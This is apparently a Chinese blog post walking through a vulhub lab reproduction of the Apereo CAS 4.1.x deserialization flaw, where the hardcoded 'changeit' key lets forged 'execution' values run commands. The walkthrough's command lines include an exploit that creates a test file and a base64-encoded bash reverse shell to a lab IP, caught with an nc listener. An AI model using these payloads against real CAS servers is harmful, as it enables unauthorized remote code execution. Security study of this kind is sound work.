vulhub漏洞复现-apereo-cas反序列化命令执行漏洞复现

最新推荐文章于 2024-03-14 11:45:15 发布
最新推荐文章于 2024-03-14 11:45:15 发布
阅读量4.4k 收藏 1
点赞数
分类专栏: vulhub 文章标签: vulhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54648419/article/details/120616759
版权

Apereo-Cas

统一认证 - Apereo CAS 简介
微服务是将单一应用程序划分成一组小的服务,服务之间互相协调、互相配合。而每个这样的小服务可能都得进行安全验证,如果每个小的服务都得独自安全验证处理的话,就太麻烦了,所以就出现了统一处理这些安全相关的认证或授权的服务,这些服务中比较出名的有Apereo CAS ,Keycloak

思路

4.1.7版本之前网站使用了Webflow框架(和wordpress差不多),漏洞出现在登陆时默认密钥changeit处,我们可以利用工具生成恶意payload去修改execution参数从而进行任意命令执行

漏洞复现

changeit源码

public class EncryptedTranscoder implements Transcoder {
    private CipherBean cipherBean;
    private boolean compression = true;

    public EncryptedTranscoder() throws IOException {
        BufferedBlockCipherBean bufferedBlockCipherBean = new BufferedBlockCipherBean();
        bufferedBlockCipherBean.setBlockCipherSpec(new BufferedBlockCipherSpec("AES", "CBC", "PKCS7"));
        bufferedBlockCipherBean.setKeyStore(this.createAndPrepareKeyStore());
        bufferedBlockCipherBean.setKeyAlias("aes128");
        bufferedBlockCipherBean.setKeyPassword("changeit");
        bufferedBlockCipherBean.setNonce(new RBGNonce());
        this.setCipherBean(bufferedBlockCipherBean);
    }

在/cas/login找到登录页面,这里可以用dirsearch去扫,当然咱们知道就直接找到了
在这里插入图片描述

利用现成Apereo-CAS-Attack来完成复现。使用 ysoserial 的 CommonsCollections4加密生成,Ysoserial-CommonsCollection的七种利用方式分析 (自己还太菜了,只能先贴到这)

java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch /tmp/test"

在这里插入图片描述
后台登录查看

docker exec -it 96 bash

在这里插入图片描述

反弹shell

生成反弹shell语句runtime-exec-payloads(不用这个在线工具自己改一下就行)
在这里插入图片描述

java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjY0LjEyOC8xMjM0IDA+JjEg}|{base64,-d}|{bash,-i}"

在这里插入图片描述

nc监听后抓包重放
在这里插入图片描述

在这里插入图片描述

Matat4
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CAS4.1反序列化漏洞vulhub
m0_46580995的博客
07-31 2605
CAS 复现环境vulhub Apereo CAS是一款Apereo发布的集认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令漏洞原理使用了默认密钥changeit public class EncryptedTranscoder implements Transcoder { private CipherBean cipherBean; private boolean co
史上最详细的 Apereo CAS 5.3开发教程:一、Apereo CAS 5.3服务端Server环境搭建
热门推荐
二总的猫
03-28 1万+
一、Apereo CAS 5.3服务端Server环境搭建 1.1. 本地配置tomcat通过https访问 1. 下载 在这里把zip文件下载下来:我下载的版本是5.3.9) https://github.com/apereo/cas-overlay-template 2. 编译 解压zip,命令行进去,执行mvn clean package 结束之后会出现 target 文件夹,里面有war包...
最新版ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
07-23
github已经不怎么好下载的,作者已经把文件上传到其他的平台,刚刚使用的时候遇到了一点问题,要将原文件名改正确了之后才能用。
Apereo cas 密钥硬编码反序列化漏洞
m0_71745258的博客
01-12 2281
Apereo CAS 单点登陆系统是Java服务器环境下使用较为广泛的单点登陆系统。CAS 全程Central Authentication Service(心认证服务),是一个单点登录协议,Apereo CAS是实现该协议的软件包。单点登录定义单点登录(Single signon),英文名称缩写SSO,SSO的意思就是在多系统的环境,登录单方系统,就可以在不用再次登录的情况下访问相关受信任的系统,也就是说只要登录一次单体系统就可以。
apereo-cas
m0_49420271的博客
06-08 123
vulhub-apereo-cas漏洞复现
Apereo-cas 4.x反序列化漏洞复现
weixin_50464560的博客
12-07 2802
转载https://www.freebuf.com/vuls/226149.html 建议再查看https://xz.aliyun.com/t/7032#toc-7的放假前看到很多文章对这个漏洞进行分析复现,又因为过年期间的特殊情况,实在是无聊至极,所以自己也来学习一下,顺便恶补一下反序列化漏洞的知识。这篇文章记录了自己的一些想法以及相关的知识点,方便自己日后忘记可以重新拾起。第一次写文章有不好的,希望大家见谅。由于部分cas版本的加密函数不同有相应的变化,因此想要按照此文章来复现漏洞的话还是选择和我一样的
Apereo CAS实现单点登录(sso)
呆大王的博客
03-08 2842
文章目录一什么是单点登录(sso)二什么是CASCAS Server3.1下载与部署cas的war包3.2启动tomcat查看cas Server是否安装成功3.3CAS Server其它功能演示四CAS 客户端五CAS 认证流程 一什么是单点登录(sso) 用户一次登录可以访问所有互相信任的应用系统 传统的session无法在系统分别部署到不同的服务器使用 二什么是CAS 是实现SSO单点登录的框架 点击进入CAS官网: 特点 开源企业级单点登录解决方案 CAS Service(CAS服务端): 是
Apereo CAS反序列化漏洞数据加解密研究
weixin_43526443的博客
09-16 1578
Apereo CAS,全称为 Central Authentication Service,是一种开源的单点登录(SSO)解决方案。4.1.7版本之前存在AES默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。其蓝队版的一个功能:一键解密流量工具,为实现**一键智能化**因此需要研究一下CAS漏洞利用execution值的加解密算法!>结论:UUID + _ + 头部长度标识(7byte) + iv长度标识(1byte) + iv值(16byte) + keyN
安装vvulhub靶场环境
weixin_45095113的博客
04-11 661
安装vvulhub靶场环境
vulhubApereo CAS 4.1 反序列化命令执行漏洞
yougexiaojiuguan的博客
02-04 464
漏洞复现过程的记录
java-cas-client:Apereo Java CAS客户端
02-03
Java Apereo CAS客户端介绍这是Java Apereo CAS客户端的官方主页。 客户端由一系列Servlet过滤器组成,这些过滤器...建立 git clone git@github.com:apereo/java-cas-client.gitcd java-cas-clientmvn clean package
cas-overlay-template:Apereo CAS WAR重叠模板
01-29
cas-overlay-template:Apereo CAS WAR重叠模板
cas-security-spring-boot-starter:用于Apereo CAS客户端的Spring Boot Starter与Spring Security完全集成
01-30
Spring Security CAS启动器 ... < artifactId>cas-security-spring-boot-starter < version>1.0.6 但是请注意,如果您来自0.xx版本,则1.xx版本会有一些重大更改。 请检出 ,尤其是breaking changes
cas-management-overlay:Apereo CAS Management Web应用程序的WAR叠加
02-04
cas-management-overlay:Apereo CAS Management Web应用程序的WAR叠加
详解使用django-mama-cas快速搭建CAS服务的实现
09-18
主要介绍了详解使用django-mama-cas快速搭建CAS服务的实现,文通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
Apereo CAS - 最强大的开源身份验证和授权框架
最新发布
gitblog_00074的博客
03-14 363
Apereo CAS - 最强大的开源身份验证和授权框架 Apereo CAS 是一个业界领先的开源身份验证和授权框架。它提供了一种简单、一致的方法来保护基于 Web 的应用程序和服务。 项目简介 Apereo CAS 提供了全面的身份验证和授权功能,包括单点登录(SSO)、多因素认证(MFA)、票证管理和 API 安全等。此外,CAS 还支持许多流行的技术和标准,如 OAuth、OpenID C...
Apereo Cas在项目接入
qq_32323239的博客
12-16 1346
Apereo CAS的一个功能就是单点登录,统一的登录登出接口与页面,让系统的模块只需要关注在业务点,而把安全认证的功能交给统一认证来做。所以客户端的集成主要是单点登录的集成,客户端指定需要做安全认证的页面,然后Apereo CAS的安全包检测校验用户登录情况,并自动与CAS登录页面进行跳转交互。1、用户访问CAS Client请求资源2、客户端程序做了重定向,重定向到CAS Server。
反序列化漏洞利用工具_Apereo_CAS_反序列化漏洞分析及利用
weixin_39777540的博客
11-28 3484
Apereo CAS 是一个开源的统一认证服务(单点登录系统),CAS是Central Authentication Service的首字母缩写。根据网上公开的漏洞详情,影响版本为4.1.X和4.2.X,本文讲述从环境搭建、漏洞分析到漏洞利用CAS反序列化漏洞一、环境搭建1. 4.1.X环境从github上下载cas-overlay-template,命令gitclone-b4.1...
Apereo CAS 4.1 反序列化命令执行漏洞
时光凉春衫薄的博客
11-26 1475
产品样子影响范围: Apereo CAS <= 4.1.7 http://your-ip:8080/cas/login即可查看到登录页面。 我们使用(apereo-cas-attack-1.0-SNAPSHOT-all.jar)来复现这个漏洞。使用ysoserial的CommonsCollections4生成加密后的Payload: jar文件下载地址 https://github.com/vulhub/Apereo-CAS-Attack/releases. java -jar ...
wpvuldemo漏洞复现
09-09
wpvuldemo是一个用于演示WordPress漏洞的工具。要复现漏洞,首先需要在本地搭建一个WordPress网站。 1. 安装环境:需要在本地环境设置好PHP、MySQL和Web服务器(如Apache)。 2. 下载WordPress:前往WordPress官方网站,下载最新版本的WordPress。 3. 解压并配置:解压WordPress压缩包,并将其文件拷贝到Web服务器的根目录下。然后创建一个MySQL数据库,并将数据库的连接信息(用户名、密码、数据库名称)记录下来。 4. 安装WordPress:在浏览器输入服务器地址,按照向导的指引进行WordPress的安装。在其,需要输入之前创建的MySQL数据库的连接信息。 5. 网站设置:完成安装后,登录WordPress后台,进入“设置”选项,根据需求进行网站的基本设置,如网站标题、描述、主题等。 6. 下载wpvuldemo:从Github上下载wpvuldemo的源代码,并将其文件拷贝到WordPress网站的根目录下。 7. 执行漏洞复现:在浏览器输入服务器地址,加上wpvuldemo的相关路径,访问对应的漏洞复现页面。 8. 检查结果:如果复现成功,会在页面上显示相关漏洞的信息和可能的攻击方式。 需要注意的是,漏洞复现过程应遵循合法合规的原则,仅在自己本地环境进行,不得用于非法用途。完成漏洞复现后,应及时升级修复漏洞或采取相应的安全措施来保护网站。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值